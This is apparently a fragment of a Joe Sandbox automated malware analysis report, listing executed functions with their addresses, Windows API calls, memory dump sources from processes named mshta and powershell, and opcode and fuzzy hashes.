                            • Opcode Fuzzy Hash: e6cb650a354e76ee0d0f76a61afb4a3e50f3ba4b775001102c8c3b00b616edf2
                            • Instruction Fuzzy Hash: 65219072D04255ABCB125F74EC44AAE7FAAAF45390B18805AF9059B311EF31DE0197A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D6311 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                            • lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                            • lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 56e1afe536800edabc182791dcc3a10a5b6ce3ba51517b924389f8eb74337b1e
                            • Instruction ID: 4f674cdd5b929f612fec73b5bf06decf375c93a7582660be890795ddf5bd3cf6
                            • Opcode Fuzzy Hash: 56e1afe536800edabc182791dcc3a10a5b6ce3ba51517b924389f8eb74337b1e
                            • Instruction Fuzzy Hash: 87E06D33D02620A787116BA8AC48C6BBBAEEE89750309041BF600D3220C72198018BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 000001C8C6290FC1 Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000003.495947797.000001C8C6290000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C8C6290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_3_1c8c6290000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: ea3a5573564c81a2ca98bf6e8495dfbf72caba294b994b10a782e199ffa766ee
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: 3B9002154D540A95E41411910C856DC904067C8258FD44498481690144DD4E5396516A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001C8C6290FB9 Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000003.495947797.000001C8C6290000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C8C6290000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_3_1c8c6290000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: ea3a5573564c81a2ca98bf6e8495dfbf72caba294b994b10a782e199ffa766ee
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: 3B9002154D540A95E41411910C856DC904067C8258FD44498481690144DD4E5396516A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFBAE761355 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.529875626.00007FFBAE760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAE760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_7ffbae760000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                            • Instruction ID: 4274224c881642fdbf1b05481568b36a9ef83a7ceaed92ab08428647454dfe75
                            • Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                            • Instruction Fuzzy Hash: BF01677111CB0C4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45
                            Uniqueness

                            Uniqueness Score: -1.00%